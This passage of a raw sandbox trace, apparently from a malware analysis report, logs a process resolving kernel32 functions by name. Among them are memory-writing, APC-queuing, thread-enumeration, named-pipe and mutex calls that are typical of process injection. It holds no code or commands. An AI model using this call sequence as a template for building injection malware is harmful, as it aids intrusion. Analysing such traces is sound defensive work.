ProcedureAddress=0xb0938cfbf0*=0x7ff977af26d0) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetModuleFileNameW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977aceca0) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetVersion", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad1fd0) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="SetEndOfFile", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5ae0) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="RemoveDirectoryW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5ad0) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetTempFileNameA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad59e0) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="DeleteCriticalSection", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977f381b0) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acbaf0) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acd680) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CloseHandle", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5510) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="WriteProcessMemory", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ace710) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateFileA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5760) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrcmpiA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acbb10) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetModuleFileNameA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad0c70) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad2080) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetCurrentProcess", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac6580) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrcmpA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acdf40) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetModuleHandleA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ace6d0) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateFileMappingA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ab5bc0) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="MapViewOfFile", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ace950) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="Sleep", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac8f00) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="UnmapViewOfFile", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acecc0) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GlobalLock", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac6230) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrlenA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acbb80) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GlobalAlloc", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acb810) returned 0x0 [0207.266] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GlobalUnlock", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac6170) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="HeapAlloc", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977f5ebf0) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrcpyA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acedf0) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetLastError", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac6060) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="HeapFree", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac6050) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="RemoveDirectoryA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5ac0) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="DeleteFileA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5790) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrcatA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad0e30) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="WriteFile", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5b80) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateDirectoryA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5730) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="HeapDestroy", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad2e50) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="HeapCreate", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad0f80) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="SetEvent", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad56b0) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="HeapReAlloc", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977f5d8d0) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetTickCount", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac60a0) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="FindNextFileW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5880) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CopyFileW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5d70) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="SetWaitableTimer", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad56c0) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="LocalAlloc", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac9310) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetCurrentThread", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac6470) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetCurrentThreadId", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac6030) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrlenW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac64b0) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetSystemTimeAsFileTime", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac9490) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateEventA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5560) returned 0x0 [0207.267] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetWindowsDirectoryA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad41b0) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="DeleteFileW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad57a0) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateDirectoryW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5740) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateWaitableTimerA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad3870) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetTempPathA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5a00) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="FindFirstFileW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5840) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="LocalFree", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac9320) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="TerminateProcess", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad2c00) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="SuspendThread", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad0d70) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="WaitForMultipleObjects", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad56e0) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="ResumeThread", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acf570) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrcpyW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad0a80) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="FileTimeToSystemTime", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5bf0) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateThread", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acbc20) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateFileW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5770) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="ResetEvent", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad56a0) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="SwitchToThread", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977aca960) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrcatW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad3830) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateProcessW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acdee0) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetFileSize", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5950) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetFileAttributesW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5930) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="ExpandEnvironmentStringsW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ace420) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="WideCharToMultiByte", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac6090) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="LeaveCriticalSection", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977f64420) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="SetLastError", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac6160) returned 0x0 [0207.268] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="EnterCriticalSection", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977f64ec0) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetComputerNameA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acc250) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateMutexA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad55a0) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="OpenWaitableTimerA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977af3a10) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="OpenMutexA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ab5e30) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetVolumeInformationA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5a20) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="WaitForSingleObject", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5700) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="ReleaseMutex", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5680) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetComputerNameW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acc3c0) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="InitializeCriticalSection", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977f938f0) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="LoadLibraryExW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acb820) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acaa40) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="VirtualFree", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acbc10) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetLogicalDriveStringsW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad59d0) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetFileAttributesA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5900) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="OpenFileMappingA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad3c10) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetExitCodeProcess", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ace450) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateProcessA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acd5b0) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrcpynA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977af36c0) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="LocalReAlloc", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad2c80) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="TlsAlloc", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acdec0) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="TlsGetValue", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac6020) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="TlsSetValue", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac64c0) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="LoadLibraryW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977aced90) returned 0x0 [0207.269] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetVersionExW", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acaa30) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="FreeLibrary", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977aceb90) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="ReadFile", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5a90) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="SetFilePointer", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5b20) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="Thread32First", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad01b0) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="QueueUserAPC", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acfe40) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateToolhelp32Snapshot", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad6830) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="OpenThread", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977aca970) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="Thread32Next", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac6720) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="FindFirstFileA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5800) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="FindNextFileA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5860) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="ConnectNamedPipe", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad30b0) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetOverlappedResult", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977acbb70) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CancelIo", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad2f50) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="DisconnectNamedPipe", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad3820) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="FlushFileBuffers", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad5890) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CallNamedPipeA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977aefe50) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateNamedPipeA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977af0070) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetSystemTime", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977aca940) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="WaitNamedPipeA", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977af0670) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetCurrentProcessId", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ac6070) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="SleepEx", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad56d0) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="RemoveVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977faa5b0) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="AddVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977f9a7b0) returned 0x0 [0207.270] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, 